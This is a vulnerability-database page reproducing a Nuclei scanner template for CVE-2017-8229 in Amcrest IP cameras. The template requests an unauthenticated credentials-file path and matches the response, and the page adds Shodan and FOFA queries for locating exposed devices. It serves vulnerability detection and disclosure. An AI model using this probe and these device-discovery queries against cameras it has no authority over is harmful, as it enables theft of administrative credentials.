Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2017-8229
HistoryAug 10, 2023 - 5:18 a.m.

Amcrest IP Camera Web Management - Data Exposure

2023-08-1005:18:14
ProjectDiscovery
github.com
12
cve2017
packetstormsecurity
seclists
amcrest
iot

CVSS2

5

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

NONE

Availability Impact

NONE

AV:N/AC:L/Au:N/C:P/I:N/A:N

CVSS3

9.8

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

AI Score

9.6

Confidence

High

EPSS

0.894

Percentile

98.8%

Amcrest IPM-721S V2.420.AC00.16.R.20160909 devices allow an unauthenticated attacker to download the administrative credentials.
id: CVE-2017-8229

info:
  name: Amcrest IP Camera Web Management - Data Exposure
  author: pussycat0x
  severity: critical
  description: |
    Amcrest IPM-721S V2.420.AC00.16.R.20160909 devices allow an unauthenticated attacker to download the administrative credentials.
  impact: |
    An attacker can gain unauthorized access to sensitive data.
  remediation: |
    Apply the latest firmware update provided by the vendor to fix the vulnerability.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2017-8229
    - http://packetstormsecurity.com/files/153224/Amcrest-IPM-721S-Credential-Disclosure-Privilege-Escalation.html
    - https://github.com/ethanhunnt/IoT_vulnerabilities/blob/master/Amcrest_sec_issues.pdf
    - https://seclists.org/bugtraq/2019/Jun/8
    - https://github.com/d4n-sec/d4n-sec.github.io
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2017-8229
    cwe-id: CWE-255
    epss-score: 0.93383
    epss-percentile: 0.99075
    cpe: cpe:2.3:o:amcrest:ipm-721s_firmware:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: amcrest
    product: ipm-721s_firmware
    shodan-query:
      - html:"Amcrest"
      - http.html:"amcrest"
    fofa-query:
      - "Amcrest"
      - amcrest
      - body="amcrest"
  tags: cve2017,cve,packetstorm,seclists,amcrest,iot

http:
  - method: GET
    path:
      - "{{BaseURL}}/current_config/Sha1Account1"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "DevInformation"
          - "SerialID"
        condition: and

      - type: word
        part: header
        words:
          - "application/octet-stream"

      - type: status
        status:
          - 200
# digest: 4a0a00473045022100c000631a0c97636538dc8e4fbca4baf666978b4bba64636814f5435ea5c89dc502206c941fddb497b4594fee41ef719d28299f1198960ade04faf4ead19ac181b3bf:922c64590222798bb761d5b6d8e72950

CVSS2

5

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

NONE

Availability Impact

NONE

AV:N/AC:L/Au:N/C:P/I:N/A:N

CVSS3

9.8

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

AI Score

9.6

Confidence

High

EPSS

0.894

Percentile

98.8%

Related for NUCLEI:CVE-2017-8229